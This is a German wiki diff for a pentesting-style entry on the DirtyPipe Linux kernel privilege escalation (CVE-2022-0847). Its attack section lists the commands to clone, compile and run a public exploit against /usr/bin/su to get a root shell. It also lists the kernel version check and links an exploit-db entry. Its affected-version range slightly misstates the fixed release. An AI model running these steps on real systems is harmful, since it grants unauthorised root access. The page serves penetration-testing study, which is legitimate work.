CVE-2022-0847: Unterschied zwischen den Versionen

Aktuelle Version vom 8. Mai 2026, 13:53 Uhr

@@ Zeile 1: / Zeile 1: @@
+==Privilege Escalation über Kernel-Exploit: DirtyPipe (CVE-2022-0847)==
+===Zielsetzung===
+*Root-Rechte durch Kernel-Schwachstelle erhalten.
+===Wie entdeckt man die Schwachstelle?===
+;Kernel-Version prüfen
+*uname -r
+;Verwundbare Versionen
+*Linux 5.8 bis 5.16.11 sind betroffen.
+===Voraussetzungen===
+{| class="wikitable"
+! Bedingung !! Beschreibung
+|-
+| Linux-Kernel-Version || 5.8 bis 5.16.11
+|-
+| Lokaler Zugriff || Vorhanden
+|-
+| shell Zugriff || Vorhanden
+|}
+===Angriff: Root-Rechte durch Exploit===
+;Exploit herunterladen
+*git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploit.git
+*cd CVE-2022-0847-DirtyPipe-Exploit
+;Exploit kompilieren
+*gcc -o dirtypipe dirtypipe.c
+;Exploit ausführen
+*./dirtypipe /usr/bin/su
+;Erwartung
+*Root-Shell erhalten.
+===Hinweise===
+*Exploit manipuliert beliebige schreibgeschützte Dateien.
+*Besonders effektiv gegen aktuelle ungehärtete Systeme.
+==Links==
 *https://www.exploit-db.com/exploits/50808